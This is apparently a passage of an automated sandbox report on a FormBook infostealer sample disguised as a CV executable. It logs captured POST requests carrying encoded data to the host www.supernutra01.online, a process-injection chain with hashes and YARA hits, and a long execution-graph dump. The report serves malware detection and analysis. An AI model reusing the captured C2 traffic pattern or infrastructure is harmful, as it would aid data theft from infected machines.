                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Data Ascii: 8z=9bH1AEbw3DW94DqmKNjm0lMXCznhqgSztLbxA6ClMYgFmXrlXGCsLAA+Eeo/Qtnd8CP9A2/is7xmLKcNlk64LHcB/Ha/S5k0XQQ+8vFbI8aT0OOk+y+JwOBi/wEmStSMDgjQmox90XzBFtXr95+exgrpxbKDIV03CpBApQ6ou8OEGNRXWEt+uWB9FnyGMtd5bxDTPv0=
                                                                                          Nov 24, 2024 08:23:16.435247898 CET | 763 | IN | HTTP/1.1 405 Not Allowed
                                                                                          Date: Sun, 24 Nov 2024 07:23:16 GMT
                                                                                          Content-Type: text/html
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cnQXAvAQQkuUKhTBpnCR3Ev5NSVEwq61QW9wsO%2F4D2wcOB3msafAEohPQRtkQikEhu7%2FdICf0s6IlJB%2FUQPSk%2Fng6mkpuNcJz12ESZjkMMIVh2dnGg7kgdN3CB%2BXTM97ttjAeEaDMtXFoQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8e77a711484d43b7-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2004&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=741&delivery_rate=0&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Nov 24, 2024 08:23:16.435511112 CET | 571 | IN | Data Ascii: 22f<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                          50 | 192.168.2.5 | 50026 | 172.67.220.36 | 80
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Nov 24, 2024 08:23:18.174545050 CET | 761 | OUT | POST /x1zr/ HTTP/1.1
                                                                                          Host: www.supernutra01.online
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                          Accept-Language: en-US,en;q=0.5
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Origin: http://www.supernutra01.online
                                                                                          Referer: http://www.supernutra01.online/x1zr/
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Connection: close
                                                                                          Cache-Control: no-cache
                                                                                          Content-Length: 223
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
                                                                                          Data Ascii: 8z=9bH1AEbw3DW95iamIqPm8lMUejnhkAS3tLXxA4u1PqEFm1jlWFasIAA+M+o+INno8CTPA3Dis7lmLP4NlTm7aHcHzna9dZk0XQQ+8uhhI8CTotWk+T+O5uBj4wEmWtSQDgj+mqUY0S/BFsnr9rGZqwrVvrKRZwViN/xMsy7f6fKBD7g9MmlW92tFV06xdd8QBSTjR4i07tdOAU5cVIeTwdl+M4uj
                                                                                          Nov 24, 2024 08:23:19.515904903 CET | 1236 | IN | HTTP/1.1 405 Not Allowed
                                                                                          Date: Sun, 24 Nov 2024 07:23:19 GMT
                                                                                          Content-Type: text/html
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=35gJRioXrbHWsq2BqQgSQsTrzA0tFF%2BaT9QIUUYlE3%2Fe4ydd%2FcuXpju%2BNb5cCVj7%2F5fzp%2BQQNHmG4MMOdwtztNVGPD%2BxvwNCql00BRtn6WaiV4yJ6HLDodq8rOjD%2FhDg3Rk46dD%2BbP7U7g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8e77a72498dd0ca4-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1636&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=761&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Ascii: 22f<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.26.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and
                                                                                          Nov 24, 2024 08:23:19.515942097 CET | 106 | IN | Data Ascii: Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->0


                                                                                          Target ID:0
                                                                                          Start time:02:19:09
                                                                                          Start date:24/11/2024
                                                                                          Path:C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe"
                                                                                          Imagebase:0xc0000
                                                                                          File size:1'207'296 bytes
                                                                                          MD5 hash:12A282DC358949660691FBFF8BCDF461
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:low
                                                                                          Has exited:true

                                                                                          Target ID:2
                                                                                          Start time:02:19:10
                                                                                          Start date:24/11/2024
                                                                                          Path:C:\Windows\SysWOW64\svchost.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\Desktop\CV Lic H&S Olivetti Renzo.exe"
                                                                                          Imagebase:0xd0000
                                                                                          File size:46'504 bytes
                                                                                          MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2388428467.00000000032E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2388123154.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2388832074.0000000003A00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:4
                                                                                          Start time:02:19:34
                                                                                          Start date:24/11/2024
                                                                                          Path:C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe"
                                                                                          Imagebase:0x490000
                                                                                          File size:140'800 bytes
                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4526133034.0000000002290000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                          Reputation:high
                                                                                          Has exited:false

                                                                                          Target ID:5
                                                                                          Start time:02:19:38
                                                                                          Start date:24/11/2024
                                                                                          Path:C:\Windows\SysWOW64\winver.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Windows\SysWOW64\winver.exe"
                                                                                          Imagebase:0x890000
                                                                                          File size:57'344 bytes
                                                                                          MD5 hash:B5471B0FB5402FC318C82C994C6BF84D
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4524870998.0000000000810000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4524992945.00000000029B0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4524586878.0000000000350000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                          Reputation:moderate
                                                                                          Has exited:false

                                                                                          Target ID:6
                                                                                          Start time:02:19:49
                                                                                          Start date:24/11/2024
                                                                                          Path:C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Program Files (x86)\huaAPOeMOgJWiutvNXfbakzVzUdlNgONJcsktljr\NObNfBLfyhvzeH.exe"
                                                                                          Imagebase:0x490000
                                                                                          File size:140'800 bytes
                                                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.4528088179.0000000004DD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                          Reputation:high
                                                                                          Has exited:false

                                                                                          Target ID:8
                                                                                          Start time:02:20:01
                                                                                          Start date:24/11/2024
                                                                                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                          Imagebase:0x7ff79f9e0000
                                                                                          File size:676'768 bytes
                                                                                          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                            Execution Graph

                                                                                            Execution Coverage:3.9%
                                                                                            Dynamic/Decrypted Code Coverage:0.4%
                                                                                            Signature Coverage:8.4%
                                                                                            Total number of Nodes:2000
                                                                                            Total number of Limit Nodes:160
calls 95528->95532 95657 106b49 87 API calls _wprintf 95529->95657 95569 cc833 95530->95569 95531->95529 95550 133504 Mailbox 95532->95550 95536 1334b8 95536->95528 95537 1336b4 95538 e1c9d _free 47 API calls 95537->95538 95539 1336bc 95538->95539 95540 c4252 84 API calls 95539->95540 95545 1336c5 95540->95545 95544 e1c9d _free 47 API calls 95544->95545 95545->95544 95546 c4252 84 API calls 95545->95546 95663 1025b5 86 API calls 4 library calls 95545->95663 95546->95545 95548 cce19 48 API calls 95548->95550 95550->95537 95550->95545 95550->95548 95658 102551 48 API calls ___crtGetEnvironmentStringsW 95550->95658 95659 102472 60 API calls 2 library calls 95550->95659 95660 109c12 48 API calls 95550->95660 95661 cba85 48 API calls ___crtGetEnvironmentStringsW 95550->95661 95662 c4dd9 48 API calls 95550->95662 95553 c661c GetFullPathNameW 95552->95553 95553->95496 95555 c657f 95554->95555 95558 cb18b 95555->95558 95557 c4114 95557->95500 95559 cb199 95558->95559 95561 cb1a2 ___crtGetEnvironmentStringsW 95558->95561 95560 cbdfa 48 API calls 95559->95560 95559->95561 95560->95561 95561->95557 95563 c28b8 95562->95563 95567 c28d7 ___crtGetEnvironmentStringsW 95562->95567 95565 df4ea 48 API calls 95563->95565 95564 df4ea 48 API calls 95566 c28ee 95564->95566 95565->95567 95566->95517 95567->95564 95568->95511 95570 cc843 __ftell_nolock 95569->95570 95571 133095 95570->95571 95572 cc860 95570->95572 95688 1025b5 86 API calls 4 library calls 95571->95688 95669 c48ba 49 API calls 95572->95669 95575 1330a8 95689 1025b5 86 API calls 4 library calls 95575->95689 95576 cc882 95670 c4550 56 API calls 95576->95670 95578 cc897 95578->95575 95580 cc89f 95578->95580 95582 cd7f7 48 API calls 95580->95582 95581 1330c4 95585 cc90c 95581->95585 95583 cc8ab 95582->95583 95671 de968 49 API calls __ftell_nolock 95583->95671 95587 1330d7 95585->95587 95588 cc91a 95585->95588 95586 cc8b7 95589 cd7f7 48 API calls 95586->95589 95591 c4907 CloseHandle 95587->95591 95674 e1dfc 95588->95674 95593 
cc8c3 95589->95593 95592 1330e3 95591->95592 95594 c41a9 136 API calls 95592->95594 95595 c660f 49 API calls 95593->95595 95596 13310d 95594->95596 95597 cc8d1 95595->95597 95599 133136 95596->95599 95602 10c396 122 API calls 95596->95602 95672 deb66 SetFilePointerEx ReadFile 95597->95672 95598 cc943 _wcscat _wcscpy 95601 cc96d SetCurrentDirectoryW 95598->95601 95690 1025b5 86 API calls 4 library calls 95599->95690 95605 df4ea 48 API calls 95601->95605 95606 133129 95602->95606 95603 cc8fd 95673 c46ce SetFilePointerEx SetFilePointerEx 95603->95673 95609 cc988 95605->95609 95610 133152 95606->95610 95611 133131 95606->95611 95608 13314d 95616 ccad1 Mailbox 95608->95616 95612 c47b7 48 API calls 95609->95612 95614 c4252 84 API calls 95610->95614 95613 c4252 84 API calls 95611->95613 95629 cc993 Mailbox __NMSG_WRITE 95612->95629 95613->95599 95615 133157 95614->95615 95617 df4ea 48 API calls 95615->95617 95664 c48dd 95616->95664 95624 133194 95617->95624 95618 cca9d 95684 c4907 95618->95684 95622 ccaa9 SetCurrentDirectoryW 95622->95616 95623 c3d98 95623->94585 95623->94607 95691 cba85 48 API calls ___crtGetEnvironmentStringsW 95624->95691 95628 1333ce 95697 109b72 48 API calls 95628->95697 95629->95618 95638 13345f 95629->95638 95640 cce19 48 API calls 95629->95640 95643 133467 95629->95643 95677 cb337 56 API calls _wcscpy 95629->95677 95678 dc258 GetStringTypeW 95629->95678 95679 ccb93 59 API calls __wcsnicmp 95629->95679 95680 ccb5a GetStringTypeW __NMSG_WRITE 95629->95680 95681 e16d0 GetStringTypeW __wtof_l 95629->95681 95682 ccc24 162 API calls 3 library calls 95629->95682 95683 dc682 48 API calls 95629->95683 95632 133480 95632->95618 95634 1333f0 95698 1229e8 48 API calls ___crtGetEnvironmentStringsW 95634->95698 95636 1333fd 95639 e1c9d _free 47 API calls 95636->95639 95700 10240b 48 API calls 3 library calls 95638->95700 95639->95616 95640->95629 95701 1025b5 86 API calls 4 library calls 95643->95701 95648 cce19 48 API calls 95653 1331dd Mailbox 95648->95653 
95651 133420 95699 1025b5 86 API calls 4 library calls 95651->95699 95653->95628 95653->95648 95653->95651 95692 102551 48 API calls ___crtGetEnvironmentStringsW 95653->95692 95693 102472 60 API calls 2 library calls 95653->95693 95694 109c12 48 API calls 95653->95694 95695 cba85 48 API calls ___crtGetEnvironmentStringsW 95653->95695 95696 dc682 48 API calls 95653->95696 95654 133439 95655 e1c9d _free 47 API calls 95654->95655 95656 13344c 95655->95656 95656->95616 95657->95536 95658->95550 95659->95550 95660->95550 95661->95550 95662->95550 95663->95545 95665 c4907 CloseHandle 95664->95665 95666 c48e5 Mailbox 95665->95666 95667 c4907 CloseHandle 95666->95667 95668 c48fc 95667->95668 95668->95623 95669->95576 95670->95578 95671->95586 95672->95603 95673->95585 95702 e1e46 95674->95702 95677->95629 95678->95629 95679->95629 95680->95629 95681->95629 95682->95629 95683->95629 95685 c4920 95684->95685 95686 c4911 95684->95686 95685->95686 95687 c4925 CloseHandle 95685->95687 95686->95622 95687->95686 95688->95575 95689->95581 95690->95608 95691->95653 95692->95653 95693->95653 95694->95653 95695->95653 95696->95653 95697->95634 95698->95636 95699->95654 95700->95643 95701->95632 95703 e1e61 95702->95703 95706 e1e55 95702->95706 95726 e7c0e 47 API calls __getptd_noexit 95703->95726 95705 e2019 95711 e1e41 95705->95711 95727 e6e10 8 API calls _wprintf 95705->95727 95706->95703 95713 e1ed4 95706->95713 95721 e9d6b 47 API calls 2 library calls 95706->95721 95709 e1fa0 95709->95703 95709->95711 95714 e1fb0 95709->95714 95710 e1f5f 95710->95703 95712 e1f7b 95710->95712 95723 e9d6b 47 API calls 2 library calls 95710->95723 95711->95598 95712->95703 95712->95711 95717 e1f91 95712->95717 95713->95703 95720 e1f41 95713->95720 95722 e9d6b 47 API calls 2 library calls 95713->95722 95725 e9d6b 47 API calls 2 library calls 95714->95725 95724 e9d6b 47 API calls 2 library calls 95717->95724 95720->95709 95720->95710 95721->95713 95722->95720 95723->95712 95724->95711 95725->95711 
95726->95705 95727->95711 95729 df4ea 48 API calls 95728->95729 95730 c6b54 95729->95730 95730->94728 95731->94722 95733 c4c8b 95732->95733 95738 c4d94 95732->95738 95734 df4ea 48 API calls 95733->95734 95733->95738 95735 c4cb2 95734->95735 95736 df4ea 48 API calls 95735->95736 95742 c4d22 95736->95742 95738->94733 95742->95738 95745 cb470 95742->95745 95773 c4dd9 48 API calls 95742->95773 95774 109af1 48 API calls 95742->95774 95775 cba85 48 API calls ___crtGetEnvironmentStringsW 95742->95775 95743->94735 95744->94737 95776 c6b0f 95745->95776 95747 cb69b 95788 cba85 48 API calls ___crtGetEnvironmentStringsW 95747->95788 95749 cb6b5 Mailbox 95749->95742 95752 13397b 95792 1026bc 88 API calls 4 library calls 95752->95792 95754 cb9e4 95794 1026bc 88 API calls 4 library calls 95754->95794 95756 133973 95756->95749 95759 cba85 48 API calls 95765 cb495 95759->95765 95760 133989 95793 cba85 48 API calls ___crtGetEnvironmentStringsW 95760->95793 95761 cbcce 48 API calls 95761->95765 95763 133909 95764 c6b4a 48 API calls 95763->95764 95767 133914 95764->95767 95765->95747 95765->95752 95765->95754 95765->95759 95765->95761 95765->95763 95769 cbdfa 48 API calls 95765->95769 95772 133939 ___crtGetEnvironmentStringsW 95765->95772 95781 cc413 59 API calls 95765->95781 95782 cbb85 95765->95782 95787 cbc74 48 API calls 95765->95787 95789 cc6a5 49 API calls 95765->95789 95790 cc799 48 API calls ___crtGetEnvironmentStringsW 95765->95790 95771 df4ea 48 API calls 95767->95771 95770 cb66c CharUpperBuffW 95769->95770 95770->95765 95771->95772 95791 1026bc 88 API calls 4 library calls 95772->95791 95773->95742 95774->95742 95775->95742 95777 df4ea 48 API calls 95776->95777 95778 c6b34 95777->95778 95779 c6b4a 48 API calls 95778->95779 95780 c6b43 95779->95780 95780->95765 95781->95765 95783 cbb9b 95782->95783 95786 cbb96 ___crtGetEnvironmentStringsW 95782->95786 95784 131b77 95783->95784 95785 dee75 48 API calls 95783->95785 95785->95786 95786->95765 95787->95765 95788->95749 
95789->95765 95790->95765 95791->95756 95792->95760 95793->95756 95794->95756 95796 c403c LoadImageW 95795->95796 95797 13418d EnumResourceNamesW 95795->95797 95798 c3ee1 RegisterClassExW 95796->95798 95797->95798 95799 c3f53 7 API calls 95798->95799 95799->94752 95801 133c33 95800->95801 95802 c4c44 95800->95802 95801->95802 95803 133c3c DestroyIcon 95801->95803 95802->94758 95826 105819 61 API calls _W_store_winword 95802->95826 95803->95802 95805 c51cb 95804->95805 95825 c52a2 Mailbox 95804->95825 95806 c6b0f 48 API calls 95805->95806 95807 c51d9 95806->95807 95808 133ca1 LoadStringW 95807->95808 95809 c51e6 95807->95809 95812 133cbb 95808->95812 95810 c6a63 48 API calls 95809->95810 95811 c51fb 95810->95811 95811->95812 95813 c520c 95811->95813 95814 c510d 48 API calls 95812->95814 95815 c5216 95813->95815 95816 c52a7 95813->95816 95819 133cc5 95814->95819 95818 c510d 48 API calls 95815->95818 95817 c6eed 48 API calls 95816->95817 95822 c5220 _memset _wcscpy 95817->95822 95818->95822 95820 c518c 48 API calls 95819->95820 95819->95822 95821 133ce7 95820->95821 95823 c518c 48 API calls 95821->95823 95824 c5288 Shell_NotifyIconW 95822->95824 95823->95822 95824->95825 95825->94763 95826->94758 95828 cef1d 95827->95828 95829 cef2f 95827->95829 96039 ce3b0 335 API calls 2 library calls 95828->96039 96040 10cc5c 86 API calls 4 library calls 95829->96040 95831 cef26 95831->94823 95833 1386f9 95833->95833 95835 cf130 95834->95835 95838 cfe30 335 API calls 95835->95838 95842 cf199 95835->95842 95836 cf3dd 95839 1387c8 95836->95839 95848 cf3f2 95836->95848 95884 cf431 Mailbox 95836->95884 95837 cf595 95844 cd7f7 48 API calls 95837->95844 95837->95884 95840 138728 95838->95840 96045 10cc5c 86 API calls 4 library calls 95839->96045 95840->95842 96042 10cc5c 86 API calls 4 library calls 95840->96042 95842->95836 95842->95837 95845 cd7f7 48 API calls 95842->95845 95878 cf229 95842->95878 95846 1387a3 95844->95846 95850 138772 95845->95850 96044 e0f0a 52 API calls __cinit 
95846->96044 95876 cf418 95848->95876 96046 109af1 48 API calls 95848->96046 95849 138b1b 95864 138bcf 95849->95864 95865 138b2c 95849->95865 96043 e0f0a 52 API calls __cinit 95850->96043 95852 cf770 95856 138a45 95852->95856 95875 cf77a 95852->95875 95854 cd6e9 55 API calls 95854->95884 95855 138c53 96060 10cc5c 86 API calls 4 library calls 95855->96060 96052 dc1af 48 API calls 95856->96052 95857 138810 96047 11eef8 335 API calls 95857->96047 95858 cfe30 335 API calls 95879 cf6aa 95858->95879 95859 10cc5c 86 API calls 95859->95884 95860 138b7e 96055 11e40a 335 API calls Mailbox 95860->96055 96057 10cc5c 86 API calls 4 library calls 95864->96057 96054 11f5ee 335 API calls 95865->96054 95866 138beb 96058 11bdbd 335 API calls Mailbox 95866->96058 95868 cfe30 335 API calls 95868->95884 95870 d1b90 48 API calls 95870->95884 95872 d1b90 48 API calls 95872->95884 95875->95870 95876->95849 95876->95879 95876->95884 95877 138c00 95898 cf537 Mailbox 95877->95898 96059 10cc5c 86 API calls 4 library calls 95877->96059 95878->95836 95878->95837 95878->95876 95878->95884 95879->95852 95879->95858 95881 cfce0 95879->95881 95879->95884 95879->95898 95880 138823 95880->95876 95883 13884b 95880->95883 95881->95898 96056 10cc5c 86 API calls 4 library calls 95881->96056 96048 11ccdc 48 API calls 95883->96048 95884->95854 95884->95855 95884->95859 95884->95860 95884->95866 95884->95868 95884->95872 95884->95881 95884->95898 96041 cdd47 48 API calls ___crtGetEnvironmentStringsW 95884->96041 96053 f97ed InterlockedDecrement 95884->96053 96061 dc1af 48 API calls 95884->96061 95888 138857 95890 138865 95888->95890 95891 1388aa 95888->95891 96049 109b72 48 API calls 95890->96049 95894 1388a0 Mailbox 95891->95894 96050 10a69d 48 API calls 95891->96050 95892 cfe30 335 API calls 95892->95898 95894->95892 95896 1388e7 96051 cbc74 48 API calls 95896->96051 95898->94823 95900 d479f 95899->95900 95901 d4637 95899->95901 95904 cce19 48 API calls 95900->95904 95902 136e05 95901->95902 95903 d4643 
95901->95903 96116 11e822 95902->96116 96115 d4300 335 API calls ___crtGetEnvironmentStringsW 95903->96115 95911 d46e4 Mailbox 95904->95911 95907 136e11 95908 d4739 Mailbox 95907->95908 96156 10cc5c 86 API calls 4 library calls 95907->96156 95908->94823 95910 d4659 95910->95907 95910->95908 95910->95911 95915 c4252 84 API calls 95911->95915 96062 106524 95911->96062 96065 10fa0c 95911->96065 96106 116ff0 95911->96106 95915->95908 95917 de253 95916->95917 95919 13df42 95916->95919 95917->94823 95918 13df77 95919->95918 95920 13df59 TranslateAcceleratorW 95919->95920 95920->95917 95922 ddca3 95921->95922 95923 ddc71 95921->95923 95922->94823 95923->95922 95924 ddc96 IsDialogMessageW 95923->95924 95925 13dd1d GetClassLongW 95923->95925 95924->95922 95924->95923 95925->95923 95925->95924 95926->94823 96291 cbd30 95927->96291 95929 d3267 95931 d32f8 95929->95931 95932 13907a 95929->95932 95997 d3628 95929->95997 96303 dc36b 86 API calls 95931->96303 96309 10cc5c 86 API calls 4 library calls 95932->96309 95935 1394df 95935->95997 96326 10cc5c 86 API calls 4 library calls 95935->96326 95937 d34eb Mailbox ___crtGetEnvironmentStringsW 95939 dc3c3 48 API calls 95937->95939 95943 13909a 95937->95943 95945 13926d 95937->95945 95962 139438 95937->95962 95964 cfe30 335 API calls 95937->95964 95982 d351f 95937->95982 95985 df4ea 48 API calls 95937->95985 95988 139394 95937->95988 95992 1393c5 95937->95992 95937->95997 96305 cd9a0 53 API calls __cinit 95937->96305 96306 cd8c0 53 API calls 95937->96306 96307 dc2d6 48 API calls ___crtGetEnvironmentStringsW 95937->96307 96319 11cda2 82 API calls Mailbox 95937->96319 96320 1080e3 53 API calls 95937->96320 96321 cd764 55 API calls 95937->96321 96322 cdcae 50 API calls Mailbox 95937->96322 95938 d3313 95938->95935 95938->95937 95938->95997 96296 c2b7a 95938->96296 95939->95937 95947 cd645 53 API calls 95943->95947 95984 1391fa 95943->95984 95944 d33ce 95944->95937 95955 d3465 95944->95955 95956 13945e 95944->95956 96318 10cc5c 86 API 
calls 4 library calls 95945->96318 95946 cfe30 335 API calls 95949 139407 95946->95949 95950 13910c 95947->95950 95958 cd6e9 55 API calls 95949->95958 95949->95997 95952 139220 95950->95952 95953 139114 95950->95953 96315 c1caa 49 API calls 95952->96315 95965 139128 95953->95965 95973 139152 95953->95973 95961 df4ea 48 API calls 95955->95961 96324 10c942 50 API calls 95956->96324 95958->95962 95977 d346c 95961->95977 96323 10cc5c 86 API calls 4 library calls 95962->96323 95963 13923d 95967 139252 95963->95967 95968 13925e 95963->95968 95964->95937 96310 10cc5c 86 API calls 4 library calls 95965->96310 96316 10cc5c 86 API calls 4 library calls 95967->96316 96317 10cc5c 86 API calls 4 library calls 95968->96317 95975 139177 95973->95975 95978 139195 95973->95978 96311 11f320 335 API calls 95975->96311 95981 ce8d0 335 API calls 95977->95981 95977->95982 95979 13918b 95978->95979 96312 11f5ee 335 API calls 95978->96312 95979->95997 96313 dc2d6 48 API calls ___crtGetEnvironmentStringsW 95979->96313 95981->95937 95986 c6eed 48 API calls 95982->95986 95987 d3540 95982->95987 96314 10cc5c 86 API calls 4 library calls 95984->96314 95985->95937 95986->95987 95991 1394b0 95987->95991 95995 d3585 95987->95995 95987->95997 95990 df4ea 48 API calls 95988->95990 95990->95992 96325 cdcae 50 API calls Mailbox 95991->96325 95992->95946 95994 d3615 96304 cdcae 50 API calls Mailbox 95994->96304 95995->95935 95995->95994 95995->95997 95998 d3635 Mailbox 95997->95998 96308 10cc5c 86 API calls 4 library calls 95997->96308 95998->94823 95999->94778 96000->94770 96001->94775 96002->94823 96003->94823 96004->94817 96005->94817 96006->94817 96008 cfe50 96007->96008 96031 cfe7e 96007->96031 96009 df4ea 48 API calls 96008->96009 96009->96031 96010 d146e 96011 c6eed 48 API calls 96010->96011 96033 cffe1 96011->96033 96012 cd7f7 48 API calls 96012->96031 96014 d0509 96333 10cc5c 86 API calls 4 library calls 96014->96333 96015 df4ea 48 API calls 96015->96031 96018 13a922 96018->94823 96019 13a246 
96024 c6eed 48 API calls 96019->96024 96020 d1473 96332 10cc5c 86 API calls 4 library calls 96020->96332 96023 c6eed 48 API calls 96023->96031 96024->96033 96025 13a873 96025->94823 96026 f97ed InterlockedDecrement 96026->96031 96027 13a30e 96027->96033 96330 f97ed InterlockedDecrement 96027->96330 96028 e0f0a 52 API calls __cinit 96028->96031 96030 13a973 96334 10cc5c 86 API calls 4 library calls 96030->96334 96031->96010 96031->96012 96031->96014 96031->96015 96031->96019 96031->96020 96031->96023 96031->96026 96031->96027 96031->96028 96031->96030 96031->96033 96034 d15b5 96031->96034 96328 d1820 335 API calls 2 library calls 96031->96328 96329 d1d10 59 API calls Mailbox 96031->96329 96033->94823 96331 10cc5c 86 API calls 4 library calls 96034->96331 96035 13a982 96036->94817 96037->94817 96038->94817 96039->95831 96040->95833 96041->95884 96042->95842 96043->95878 96044->95884 96045->95898 96046->95857 96047->95880 96048->95888 96049->95894 96050->95896 96051->95894 96052->95884 96053->95884 96054->95884 96055->95881 96056->95898 96057->95898 96058->95877 96059->95898 96060->95898 96061->95884 96157 106ca9 GetFileAttributesW 96062->96157 96066 10fa1c __ftell_nolock 96065->96066 96067 10fa44 96066->96067 96242 cd286 48 API calls 96066->96242 96161 c936c 96067->96161 96070 10fa5e 96071 10fa80 96070->96071 96072 10fb68 96070->96072 96082 10fb92 96070->96082 96073 c936c 81 API calls 96071->96073 96074 c41a9 136 API calls 96072->96074 96080 10fa8c _wcscpy _wcschr 96073->96080 96075 10fb79 96074->96075 96076 10fb8e 96075->96076 96078 c41a9 136 API calls 96075->96078 96077 c936c 81 API calls 96076->96077 96076->96082 96079 10fbc7 96077->96079 96078->96076 96081 e1dfc __wsplitpath 47 API calls 96079->96081 96085 10fab0 _wcscat _wcscpy 96080->96085 96088 10fade _wcscat 96080->96088 96090 10fbeb _wcscat _wcscpy 96081->96090 96082->95908 96083 c936c 81 API calls 96084 10fafc _wcscpy 96083->96084 96243 1072cb GetFileAttributesW 96084->96243 96086 c936c 81 API calls 
